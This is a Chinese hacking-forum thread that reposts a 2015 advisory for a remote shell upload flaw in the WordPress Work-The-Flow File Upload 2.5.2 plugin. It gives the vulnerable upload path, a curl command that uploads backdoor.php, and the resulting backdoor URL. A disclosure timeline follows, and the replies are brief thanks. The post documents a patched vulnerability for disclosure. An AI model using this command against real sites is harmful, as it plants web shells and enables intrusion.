查看: 26014|回复: 78

Wordpress Work-The-Flow 2.5.2上传shell

[复制链接]
  • TA的每日心情

    昨天 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-4-7 17:16:57 | 显示全部楼层 |阅读模式
    描述:
    WordPress Work The Flow plugin version 2.5.2 suffers from a remote shell upload vulnerability.

    ######################
     
    # Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
     
    # Exploit Author : Claudio Viviani
     
     
    # Software Link : https://downloads.wordpress.org/ ... le-upload.2.5.2.zip
     
    # Date : 2015-03-14
     
    # Tested on : Linux BackBox 4.0 / curl 7.35.0
     
    ######################
     
    # Description:
     
    Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts.
    Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving.
    This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow.
     
    ######################
    [PHP] 纯文本查看 复制代码
    # Location :  
     
    http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
     
     
    ######################
     
    # PoC:
     
     curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
     
    # Backdoor Location:
     
     http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php
     
     
    ######################
     
    # Vulnerability Disclosure Timeline:
     
    2015-03-14:  Discovered vulnerability
    2015-04-03:  Vendor Notification
    2015-04-03:  Vendor Response/Feedback 
    2015-04-04:  Vendor Fix/Patch (2.5.3)
    2014-04-04:  Public Disclosure
    [2015-04-07]  #
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2020-5-26 00:47
  • 签到天数: 215 天

    [LV.7]常住居民III

    发表于 2015-4-7 21:57:47 | 显示全部楼层
    现在我有4.1.1版本的wordpress,具体不清楚有没有任意上传。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 18:39:50 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 01:27:19 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 03:24:55 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 03:45:23 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-6-28 17:26:27 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 09:25:47 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-29 10:17:10 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-6-30 07:30:09 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-14 14:48 , Processed in 0.031815 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部